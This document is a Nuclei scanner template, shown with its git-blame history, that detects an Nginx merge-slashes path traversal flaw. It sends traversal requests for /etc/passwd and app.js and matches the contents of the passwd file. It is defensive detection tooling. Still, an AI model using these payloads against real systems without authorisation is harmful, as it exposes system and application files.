nuclei-templates/vulnerabilities/other/nginx-merge-slashes-path-tr...

id: nginx-merge-slashes-path-traversal

info:
  name: Nginx Merge Slashes Path Traversal
  author: dhiyaneshDk
  severity: medium
  description: A vulnerability in the remote Nginx server could cause the server to merge slashslash together causing what should have protected the web site from a directory traversal vulnerability into a vulnerable server.
  reference:
    - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/nginx-merge-slashes-path-traversal.json
    - https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d
  tags: exposure,config,lfi,nginx

requests:
  - method: GET
    path:
      - "{{BaseURL}}///////../../../etc/passwd"
      - "{{BaseURL}}/static///////../../../../etc/passwd"
      - "{{BaseURL}}///../app.js"

    stop-at-first-match: true
    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:.*:0:0:"
          - "app.listen"
        part: body
        condition: or

      - type: status
        status:
          - 200
Create nginx-merge-slashes-path-traversal.yaml 2021-07-21 08:16:40 +00:00			`id: nginx-merge-slashes-path-traversal`

			`info:`
			`name: Nginx Merge Slashes Path Traversal`
			`author: dhiyaneshDk`
			`severity: medium`
Add description 2021-10-13 09:00:39 +00:00			`description: A vulnerability in the remote Nginx server could cause the server to merge slashslash together causing what should have protected the web site from a directory traversal vulnerability into a vulnerable server.`
Removed pipe (\|) character from references, because the structure requires it to be a string slice, not a string Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-18 11:37:49 +00:00			`reference:`
Satisfying the linter (all errors and warnings) * whitespace modifications only 2021-08-19 14:44:46 +00:00			`- https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/nginx-merge-slashes-path-traversal.json`
			`- https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d`
matcher update 2021-07-23 21:55:22 +00:00			`tags: exposure,config,lfi,nginx`
Create nginx-merge-slashes-path-traversal.yaml 2021-07-21 08:16:40 +00:00
			`requests:`
			`- method: GET`
			`path:`
matcher update 2021-07-23 21:55:22 +00:00			`- "{{BaseURL}}///////../../../etc/passwd"`
			`- "{{BaseURL}}/static///////../../../../etc/passwd"`
Create nginx-merge-slashes-path-traversal.yaml 2021-07-21 08:16:40 +00:00			`- "{{BaseURL}}///../app.js"`
Update vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml Co-authored-by: Toufik Airane <toufik.airane@appsectribe.com> 2021-07-23 18:55:13 +00:00
Added stop-at-first-match in applicable templates 2021-09-02 11:59:10 +00:00			`stop-at-first-match: true`
Create nginx-merge-slashes-path-traversal.yaml 2021-07-21 08:16:40 +00:00			`matchers-condition: and`
			`matchers:`
matcher update 2021-07-23 21:55:22 +00:00
			`- type: regex`
			`regex:`
matcher update to handle edge cases 2021-07-24 21:35:55 +00:00			`- "root:.*:0:0:"`
Create nginx-merge-slashes-path-traversal.yaml 2021-07-21 08:16:40 +00:00			`- "app.listen"`
			`part: body`
Update vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml Co-authored-by: Toufik Airane <toufik.airane@appsectribe.com> 2021-07-23 18:54:37 +00:00			`condition: or`

Create nginx-merge-slashes-path-traversal.yaml 2021-07-21 08:16:40 +00:00			`- type: status`
			`status:`
			`- 200`